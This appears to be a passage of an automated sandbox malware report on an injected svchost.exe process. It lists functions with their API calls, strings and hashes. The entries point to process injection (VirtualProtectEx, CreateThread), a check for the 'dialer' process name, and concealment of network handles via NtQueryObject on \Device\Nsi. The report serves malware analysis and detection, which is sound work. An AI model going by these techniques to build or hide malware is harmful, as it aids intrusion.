Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction ID: 0f0f0cf29caf80587c070d24c158894d07b31f9cdb686283d2a0c3121fcb2762
Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction Fuzzy Hash: 1351E83A61479183EA389E2999743FAA651F3E5B81F10402DCFCA13F99DA37C481CBD1

Function 0000016C211624DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000016C211625C3
StrCpyW.SHLWAPI ref: 0000016C211625DA

Strings

\\.\pipe\, xrefs: 0000016C211625CE

Memory Dump Source

Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction ID: dbfb6d2829cb4421800de605741d321438edb1f47804a312cf30740133f4e650
Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction Fuzzy Hash: 2D51A43A7187C142E6789A29A9783FA7651F3E5781F15402DDFCA03F99DA37C8858B80

Function 0000016C211D0604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 0000016C211D071B
GetLastError.KERNEL32 ref: 0000016C211D073D

Strings

U, xrefs: 0000016C211D06C7

Memory Dump Source

Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction ID: 12d2141ec145c3b86287e7edd7090d2f952637adf6e882a1912e5f63ec0e9bf4
Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction Fuzzy Hash: CB41A77A725A4081EF209F25E8543EA67A0F7E8785F514129EFCD87B54DB3DC581CB80

Function 0000016C21170604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 0000016C2117071B
GetLastError.KERNEL32 ref: 0000016C2117073D

Strings

U, xrefs: 0000016C211706C7

Memory Dump Source

Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction ID: 5732acd9d87eb31710d82fb1ef79efc6dfd2e34cc95d5393707fb293c4f7eff9
Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction Fuzzy Hash: 4541A776315B8081EB109F25E8643EAA7A0F7E8795F554029EFCD87B54DB3DC582CB80

Function 0000016C211CD6C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000016C211CD6F9
LCMapStringW.KERNEL32 ref: 0000016C211CD781

Strings

LCMapStringEx, xrefs: 0000016C211CD6DC, 0000016C211CD6ED

Memory Dump Source

Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction ID: 367ffe91377a11250c5dbfc00c587626adb080f6ba7e16a74afeb3b4d8e94e48
Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction Fuzzy Hash: A6113B3A208BC086DB60CB55B8502AAB7A0F7D8B94F54412AEFCD53F59DF39C4808B80

Function 0000016C2116D6C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000016C2116D6F9
LCMapStringW.KERNEL32 ref: 0000016C2116D781

Strings

LCMapStringEx, xrefs: 0000016C2116D6DC, 0000016C2116D6ED

Memory Dump Source

Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction ID: 83c2c5c8f2731e922c5ceba7e9523740c079107852d5bc1e0e384557f27f80cb
Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction Fuzzy Hash: 10110B3A608BC086DB60CB56F8502AAB7A4F7D9B94F54412AEFCD43F59DF39C4918B40

Function 0000016C211C94A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 0000016C211C94E8
RaiseException.KERNEL32 ref: 0000016C211C952E

Strings

csm, xrefs: 0000016C211C951B

Memory Dump Source

Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction ID: ff4ef385d5e1f9dc09268b517e7edaf39318352c9655bab34ffb65fff72fcfbe
Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction Fuzzy Hash: 22114236218B8482EB608F15E9503A9B7A0F7D4B95F184215DFCD07B58DF39C591C740

Function 0000016C211694A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 0000016C211694E8
RaiseException.KERNEL32 ref: 0000016C2116952E

Strings

csm, xrefs: 0000016C2116951B

Memory Dump Source

Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction ID: 1831a1e8fe2135f263ddc4f8ba600c0e4896ca93aac9740321319821de2308e4
Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction Fuzzy Hash: 26114C36218B8482EB648F15E9502AA77A0F7D8B99F184225DFCD07B68DF3AC591CB40

Function 0000016C211CD65C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000016C211CD68D
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 0000016C211CD6A7

Strings

InitializeCriticalSectionEx, xrefs: 0000016C211CD681

Memory Dump Source

Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction ID: 1ad5ad443e48c7d9891e29dad2a88d2a95991e7ad2a9cccb0bb2ade2e2032015
Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction Fuzzy Hash: 93F0B43D320B9091EE045B45F8111E96221A7D8B91F484019AFC913F54CF3AC4D4C7C1

Function 0000016C2116D65C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000016C2116D68D
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 0000016C2116D6A7

Strings

InitializeCriticalSectionEx, xrefs: 0000016C2116D681

Memory Dump Source

Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction ID: 2c3a8c8ddd5fcf93ee92c7f924a2b52a3f687d4675613e70ed85daf879bc5014
Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction Fuzzy Hash: DDF0543971478091EA155B52F8505E96221A7D8B91F585019EFD903F54CF3BC9D6C780

Function 0000016C211CD608 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000016C211CD631
TlsSetValue.KERNEL32 ref: 0000016C211CD648

Strings

FlsSetValue, xrefs: 0000016C211CD61E

Memory Dump Source

Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction ID: 7c284d29b508912afbd507fbef071bb43b8f6b03a5eb0b8ce13a62de1d78d0d1
Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction Fuzzy Hash: A7E0657D22074091FE094B54FC216F96222ABE8782F584029DF8906F55CF3AC8D5C7C1

Function 0000016C2116D608 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000016C2116D631
TlsSetValue.KERNEL32 ref: 0000016C2116D648

Strings

FlsSetValue, xrefs: 0000016C2116D61E

Memory Dump Source

Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction ID: 8fca6d64bd7c8ce5edf493470c2f96acf7c3298e374ca77535f4cd5ae507b5aa
Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction Fuzzy Hash: EAE0657961064091EE054B51FC256F92222ABE8782F58802EDFC906F55CF3BC8D6C780

Function 0000016C2113CB9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000016C2113CBC5

Strings

November, xrefs: 0000016C2113CBA8, 0000016C2113CBB2
October, xrefs: 0000016C2113CBBE

Memory Dump Source

Source File: 0000000D.00000002.2633076698.0000016C21130000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21130000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c21130000_svchost.jbxd

Similarity

API ID: try_get_function
String ID: November$October
API String ID: 2742660187-1636048786
Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction ID: 890b65e7936a5be55288ecca53bfe997dcb8dd25c27aab950b388e681bf1e270
Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction Fuzzy Hash: 1BE0657930098591EA089B52BC713F4621197F4F42F59502A9F9A06E59CE3AC8C69280

Function 0000016C211C1D60 Relevance: 5.1, APIs: 4, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000016C211C1D9B
HeapAlloc.KERNEL32 ref: 0000016C211C1DAA
GetProcessHeap.KERNEL32 ref: 0000016C211C1E1E
HeapFree.KERNEL32 ref: 0000016C211C1E2C

Memory Dump Source

Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction ID: fe7f70c9b01a776c4600d65242492d453f1c520b8b965682475c96f809560b67
Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction Fuzzy Hash: E021A33A654B90C1EB128F69A8142EAB3A0FBE4B95F554118DFCC97F14EE39C5828740

Function 0000016C21161D60 Relevance: 5.1, APIs: 4, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000016C21161D9B
HeapAlloc.KERNEL32 ref: 0000016C21161DAA
GetProcessHeap.KERNEL32 ref: 0000016C21161E1E
HeapFree.KERNEL32 ref: 0000016C21161E2C

Memory Dump Source

Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction ID: 4fd021d44bc251e6c019001d70fed18a74ef30a47250af91e4af9a8afb704653
Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction Fuzzy Hash: 9821713A605BD085EB128F59A8142EAB3A0FBD4B95F154118DFCC47F14EF7AC5828740

Function 0000016C211C1274 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000016C211C127A
HeapAlloc.KERNEL32 ref: 0000016C211C1289
GetProcessHeap.KERNEL32 ref: 0000016C211C12A3
HeapAlloc.KERNEL32 ref: 0000016C211C12B4

Memory Dump Source

Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction ID: 488063919b9adf6f39e3b7fef52b3da0e2a16ff86ab7b11c546b6edb740dcd12
Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction Fuzzy Hash: 4FE039B9631601C6EB048B72D8243AA36E1EB98B02F488028CE8907750DF7EC4D9C780

Analysis Process: svchost.exePID: 660, Parent PID: 8108COMMON

Execution Graph

Execution Coverage:	0.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	68
Total number of Limit Nodes:	2

Executed Functions

Function 0000026F48143458 Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 0000026F4814347A
PathFindFileNameW.SHLWAPI ref: 0000026F48143489

Part of subcall function 0000026F48143930: StrCmpNIW.SHLWAPI ref: 0000026F48143948

Part of subcall function 0000026F48143878: GetModuleHandleW.KERNEL32 ref: 0000026F48143886
Part of subcall function 0000026F48143878: GetCurrentProcess.KERNEL32 ref: 0000026F481438B4
Part of subcall function 0000026F48143878: VirtualProtectEx.KERNEL32 ref: 0000026F481438D6
Part of subcall function 0000026F48143878: GetCurrentProcess.KERNEL32 ref: 0000026F481438F4
Part of subcall function 0000026F48143878: VirtualProtectEx.KERNEL32 ref: 0000026F48143915

CreateThread.KERNEL32 ref: 0000026F481434D7

Part of subcall function 0000026F48141EB4: GetCurrentThread.KERNEL32 ref: 0000026F48141EBF

Memory Dump Source

Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction ID: abb54b9b434214e89d45aa004bc454e62556a9fa111dc1bc77e152ff3e5a9541
Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction Fuzzy Hash: E5115E70A146C151FFE19B69BB5EB9B2290B7D4B14F4800379B3687DA4EF3BC0C48210

Function 0000026F48141C28 Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000026F48141650: GetProcessHeap.KERNEL32 ref: 0000026F4814165B
Part of subcall function 0000026F48141650: HeapAlloc.KERNEL32 ref: 0000026F4814166A
Part of subcall function 0000026F48141650: RegOpenKeyExW.ADVAPI32 ref: 0000026F481416DA
Part of subcall function 0000026F48141650: RegOpenKeyExW.ADVAPI32 ref: 0000026F48141707
Part of subcall function 0000026F48141650: RegCloseKey.ADVAPI32 ref: 0000026F48141721
Part of subcall function 0000026F48141650: RegOpenKeyExW.ADVAPI32 ref: 0000026F48141741
Part of subcall function 0000026F48141650: RegCloseKey.ADVAPI32 ref: 0000026F4814175C
Part of subcall function 0000026F48141650: RegOpenKeyExW.ADVAPI32 ref: 0000026F4814177C
Part of subcall function 0000026F48141650: RegCloseKey.ADVAPI32 ref: 0000026F48141797
Part of subcall function 0000026F48141650: RegOpenKeyExW.ADVAPI32 ref: 0000026F481417B7
Part of subcall function 0000026F48141650: RegCloseKey.ADVAPI32 ref: 0000026F481417D2
Part of subcall function 0000026F48141650: RegOpenKeyExW.ADVAPI32 ref: 0000026F481417F2

Sleep.KERNEL32 ref: 0000026F48141C43
SleepEx.KERNELBASE ref: 0000026F48141C49

Part of subcall function 0000026F48141650: RegCloseKey.ADVAPI32 ref: 0000026F4814180D
Part of subcall function 0000026F48141650: RegOpenKeyExW.ADVAPI32 ref: 0000026F4814182D
Part of subcall function 0000026F48141650: RegCloseKey.ADVAPI32 ref: 0000026F48141848
Part of subcall function 0000026F48141650: RegOpenKeyExW.ADVAPI32 ref: 0000026F48141868
Part of subcall function 0000026F48141650: RegCloseKey.ADVAPI32 ref: 0000026F48141883
Part of subcall function 0000026F48141650: RegOpenKeyExW.ADVAPI32 ref: 0000026F481418A3
Part of subcall function 0000026F48141650: RegCloseKey.ADVAPI32 ref: 0000026F481418BE
Part of subcall function 0000026F48141650: RegCloseKey.ADVAPI32 ref: 0000026F481418C8

Memory Dump Source

Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction ID: ba7a0680aca1b6097396dc8ef16d73effedf0e8f67c574bfc877db16a4ac741b
Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction Fuzzy Hash: D331AEB52006A191FED09F26FB5D35B16A5ABC4FD8F1450339F3A87E96EE27C8D08250

Function 0000026F48143930 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCmpNIW.SHLWAPI ref: 0000026F48143948

Strings

dialer, xrefs: 0000026F48143941

Memory Dump Source

Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd

Similarity

API ID:
String ID: dialer
API String ID: 0-3528709123
Opcode ID: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
Instruction ID: eff1a7aee03a30e97bb5fe2f87625046466ec6f67d7186fe659e52bc7bfcaf39
Opcode Fuzzy Hash: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
Instruction Fuzzy Hash: 1AD05E7135168A86FFD49FA9E9896622350AB84B04F848032CB3503964EF1AC9CD8A10

Function 0000026F47BD2908 Relevance: 1.7, APIs: 1, Instructions: 186
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 0000026F47BD2A31

Memory Dump Source

Source File: 0000000E.00000002.2629301431.0000026F47BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F47BD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26f47bd0000_svchost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction ID: 7ddc2b2680c9a5ddce4fff25be5b549c171b19c2feb780793ca55ca44d11e2de
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: EB61F33270569187FEACCF15E6447AAB3A1FB48BA4F548135EB1907B89DF3AD852C700

Non-executed Functions

Function 0000026F48142CDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 0000026F48142D80
lstrlenW.KERNEL32 ref: 0000026F48142FBA

Part of subcall function 0000026F48141A14: OpenProcess.KERNEL32 ref: 0000026F48141A3A
Part of subcall function 0000026F48141A14: K32GetModuleFileNameExW.KERNEL32 ref: 0000026F48141A58
Part of subcall function 0000026F48141A14: PathFindFileNameW.SHLWAPI ref: 0000026F48141A67
Part of subcall function 0000026F48141A14: lstrlenW.KERNEL32 ref: 0000026F48141A73
Part of subcall function 0000026F48141A14: StrCpyW.SHLWAPI ref: 0000026F48141A86
Part of subcall function 0000026F48141A14: CloseHandle.KERNEL32 ref: 0000026F48141A94

GetProcAddress.KERNEL32 ref: 0000026F48142D95

Part of subcall function 0000026F48141554: StrCmpIW.SHLWAPI ref: 0000026F48141585

Part of subcall function 0000026F48143930: StrCmpNIW.SHLWAPI ref: 0000026F48143948

StrCmpNIW.SHLWAPI ref: 0000026F48142DD8
lstrlenW.KERNEL32 ref: 0000026F48142F00

Strings

ntdll.dll, xrefs: 0000026F48142D79
NtQueryObject, xrefs: 0000026F48142D8B
\Device\Nsi, xrefs: 0000026F48142DCB

Memory Dump Source

Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction ID: 4025dfe6008443e31e864355acdb0df0d762dcba5fdafd9cf139e97290130a4b
Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction Fuzzy Hash: AFB15C722106D081EF958F29E658BAA63A4FB84F94F545027EF7953F94DE36C9C0C340

Function 0000026F48147E70 Relevance: 10.6, APIs: 7, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 0000026F48147E8C
RtlCaptureContext.NTDLL ref: 0000026F48147EB9
RtlLookupFunctionEntry.NTDLL ref: 0000026F48147ED3
RtlVirtualUnwind.NTDLL ref: 0000026F48147F14
IsDebuggerPresent.KERNEL32 ref: 0000026F48147F68
SetUnhandledExceptionFilter.KERNEL32 ref: 0000026F48147F89
UnhandledExceptionFilter.KERNEL32 ref: 0000026F48147F94

Memory Dump Source

Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction ID: 8f476f5d24f6658f3e0b8921e2153d67be11316824d99654f8adcd85deb8d95a
Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction Fuzzy Hash: 93313A72205AC486EBA09F64F8447EA7360F785B44F84442ADB6E47EA8EF39C588C710

Function 0000026F4814B50C Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 0000026F4814B585
RtlLookupFunctionEntry.NTDLL ref: 0000026F4814B59D
RtlVirtualUnwind.NTDLL ref: 0000026F4814B5D8
IsDebuggerPresent.KERNEL32 ref: 0000026F4814B611
SetUnhandledExceptionFilter.KERNEL32 ref: 0000026F4814B61B
UnhandledExceptionFilter.KERNEL32 ref: 0000026F4814B626

Memory Dump Source

Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction ID: 901dff2f7e6f04cce7988970645566b64514ea551194aa7de3f2cd95ba923f73
Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction Fuzzy Hash: B1314A36204B8086EBA08F25F94479A73A4F789B54F900526EBAD47FA5DF39C5858B00

Function 0000026F4814FEF8 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 0000026F4814FF67
WriteFile.KERNEL32 ref: 0000026F4815021E
WriteFile.KERNEL32 ref: 0000026F48150270
GetLastError.KERNEL32 ref: 0000026F48150372
GetLastError.KERNEL32 ref: 0000026F481503D2

Memory Dump Source

Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID:
API String ID: 1443284424-0
Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction ID: 8278442d33cc96729c9d697048d83ac9363f3d313aa239b5e8643e0731caa01e
